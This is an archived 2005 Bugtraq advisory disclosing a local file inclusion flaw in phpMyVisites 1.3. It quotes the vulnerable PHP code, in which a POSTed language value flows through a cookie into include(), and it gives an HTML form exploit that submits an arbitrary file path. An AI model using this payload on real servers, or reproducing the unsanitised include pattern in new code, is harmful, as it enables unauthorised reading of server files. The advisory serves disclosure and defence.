lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 26 Apr 2005 19:35:00 -0000
From: Max Cerny <max@...rny.cz>
To: bugtraq@...urityfocus.com
Subject: [exploits] phpMyVisites 1.3 local file retrieval




==================================================================
File: phpMyVisites 1.3 local file retrieval
From: remote
Date: 26/04/2005
Credits: Max Cerny (max[at]czerny[dot]cz)
Vendor: http://www.phpmyvisites.net
Affected version: 1.3, > not tested
==================================================================

==================================================================
Description:
 Remote user can retrieve local file on the webserver 
phpMyVisites is running on. It's cause due to bad user data 
validation code. 

FILE: include/set_lang.php

line 94: 
 include "./langs/".$lang['default_lang'];

assuming, we have set $lang['default_lang'] on line 66:
 $lang['default_lang'] = $_COOKIE[$nomcookielg];

it's good, look onto 
line 40:
 setcookie($nomcookielg,$_POST['mylang'],time()+3600*24*365*10);

Now, we are able to spoof the value of $_POST['mylang'] to any file, 
we want to be retrieved.

==================================================================

==================================================================
Exploit:
 <form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
Local file: <input type="text" name="mylang" value="" />
<input type="submit" value="Alexx says RELAX!">
</form>

==================================================================

==================================================================
Fix:
 Contact the Vendor

==================================================================
			Have a nice Day !
==================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ